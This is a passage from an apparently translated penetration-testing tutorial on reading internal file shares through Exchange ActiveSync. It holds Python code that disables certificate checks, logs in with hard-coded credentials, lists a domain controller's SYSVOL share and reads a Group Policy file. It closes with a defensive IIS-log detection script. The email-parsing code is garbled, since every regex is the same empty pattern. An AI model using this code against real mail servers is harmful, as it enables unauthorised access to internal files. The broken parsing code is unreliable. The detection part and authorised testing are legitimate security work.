Penetration Testing | Penetration Testing Tips: Accessing Internal File Shares through Exchange ActiveSync (Part 3)


data = pattern_data.findall(email)
print("ThreadTopic:" + data[0])
pattern_data = re.compile(r"(.*?)")
data = pattern_data.findall(email)
print("Importance:" + data[0])
pattern_data = re.compile(r"(.*?)")
data = pattern_data.findall(email)
print("Read:" + data[0])
pattern_data = re.compile(r"(.*?)")
data = pattern_data.findall(email)
# A message can carry several attachments, so print every match.
for name in data:
    print("Attachment:" + name)
pattern_data = re.compile(r"(.*?)")
data = pattern_data.findall(email)
print("ConversationIndex:" + data[0])
# Locate the HTML body; the +7 below covers the length of "</html>".
index1 = email.find("<html>")
index2 = email.find("</html>")
# Save the body to a file named after the unique ConversationIndex.
filename = data[0] + ".html"
print("[+] Save body to %s" % (filename))
with open(filename, "w+") as file_object:
    file_object.write(email[index1:index2 + 7])
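Note that in the returned email content, the message body is in HTML format. My code extracts the body and saves it as an HTML file, using the unique ConversationIndex as the file name.
To retrieve the messages in the outbox, py_activesync_helper.py needs to be modified. For the details of the change, see https://github.com/solbirn/pyActiveSync/blob/master/pyActiveSync/dev_playground.py#L150
(3) Accessing file shares

Example code for listing shared files: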
import peas
# Create an instance of the PEAS client.
client = peas.Peas()
# Disable certificate verification so self-signed certificates don't cause errors.
client.disable_certificate_verification()
# Set the credentials and server to connect to.
client.set_creds({
    "server": "192.168.1.1",
    "user": "test1",
    "password": "123456789",
})
# Retrieve a file share directory listing.
listing = client.get_unc_listing(r"\\dc1\SYSVOL")
for data in listing:
    print("")
    for key, value in data.items():
        print("{key}:{value}".format(key=key, value=value))
Example code for reading the contents of a specified shared file:
import peas
# Create an instance of the PEAS client.
client = peas.Peas()
# Disable certificate verification so self-signed certificates don't cause errors.
client.disable_certificate_verification()
# Set the credentials and server to connect to.
client.set_creds({
    "server": "192.168.1.1",
    "user": "test1",
    "password": "123456789",
})
# Read the contents of a single file from the share.
data = client.get_unc_file(r"\\dc1\SYSVOL\test.com\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI")
print(data)
0x05 Details of accessing internal file shares through Exchange ActiveSync
1. Listing shared files
Example of the URL that is requested:

https://192.168.1.1/Microsoft-Server-ActiveSync?Cmd=Search&User=test1&DeviceId=123456&DeviceType=Python
The parameters are as follows:
· Cmd=Search: the command type is Search
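
For defenders, the query-string parameters shown above (Cmd, User, DeviceId, DeviceType) are recorded in the IIS log of the Exchange server, so Search requests from unexpected client types can be surfaced from there. The following is an added example, not code from the original article: the log lines are constructed, and the field layout and the EXPECTED_DEVICE_TYPES allowlist are assumptions to adapt to your environment.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log sample (not from the article); columns follow the #Fields header.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2020-01-01 10:00:01 POST /Microsoft-Server-ActiveSync Cmd=Sync&User=alice&DeviceId=A1B2C3&DeviceType=iPhone alice 10.0.0.5 200
2020-01-01 10:00:07 POST /Microsoft-Server-ActiveSync Cmd=Search&User=test1&DeviceId=123456&DeviceType=Python test1 10.0.0.99 200
2020-01-01 10:00:09 POST /Microsoft-Server-ActiveSync Cmd=Search&User=test1&DeviceId=123456&DeviceType=Python test1 10.0.0.99 200
2020-01-01 10:00:12 POST /Microsoft-Server-ActiveSync Cmd=Search&User=bob&DeviceId=D4E5F6&DeviceType=Android bob 10.0.0.7 200
2020-01-01 10:00:15 GET /owa/ - bob 10.0.0.7 200
"""

# Assumption: device types this organisation expects to see (compared in lowercase).
EXPECTED_DEVICE_TYPES = {"iphone", "ipad", "android", "outlook", "windowsmail"}


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def unexpected_search_clients(text):
    """Count Cmd=Search requests per (user, device id, device type, client IP)
    whose DeviceType is outside the expected set."""
    hits = {}
    for entry in parse_w3c(text):
        if entry["cs-uri-stem"].lower() != "/microsoft-server-activesync":
            continue
        query = {k.lower(): v[0] for k, v in parse_qs(entry["cs-uri-query"]).items()}
        if query.get("cmd", "").lower() != "search":
            continue
        device_type = query.get("devicetype", "")
        if device_type.lower() in EXPECTED_DEVICE_TYPES:
            continue
        key = (query.get("user", ""), query.get("deviceid", ""), device_type, entry["c-ip"])
        hits[key] = hits.get(key, 0) + 1
    return hits


if __name__ == "__main__":
    for (user, dev_id, dev_type, ip), count in unexpected_search_clients(SAMPLE_LOG).items():
        print(f"{count} Search request(s): user={user} device={dev_id} type={dev_type} ip={ip}")
```

DeviceType is chosen by the client, so treat a hit as a lead for review rather than proof. The URL alone also does not show which store a Search request targets, because that is carried in the request body.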

